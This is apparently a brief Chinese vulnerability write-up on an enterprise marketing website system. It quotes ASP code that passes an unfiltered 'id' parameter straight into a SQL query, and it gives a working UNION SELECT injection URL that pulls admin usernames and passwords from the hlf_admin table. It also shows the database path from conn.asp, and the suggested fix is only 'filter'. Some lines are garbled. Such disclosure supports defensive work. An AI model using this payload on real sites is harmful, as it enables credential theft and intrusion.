############################################################################ Team:makebugs # Author: 缘分 ############################################################################
' \news_show.asp <% id=request.QueryString("id") k=request.QueryString("k") %> <% set rs3=server.CreateObject("adodb.recordset") sql3="select * from hlf_news where id="&id rs3.open sql3,conn,1,1 if not rs3.eof then %>
过滤问题:
http://HdhCmsTest2cto测试数据 /news_show.asp?id=106 union select 1,admin,3,4,password,6 from hlf_admin
在看后台的conn.asp
<% db="databases/##hongquan.mdb" ' 数据库 文件位置 'on error resume next '不知道为什么给注释了 set conn=Server.Createobject("adodb.connection") conn.open"Provider=Microsoft.Jet.OLEDB.4.0;"&"Data Source=" & Server.MapPath(db) %>
国际问题了
修复:过滤
查看更多关于918企业营销网站展示系统漏洞及修复 - 网站安全的详细内容...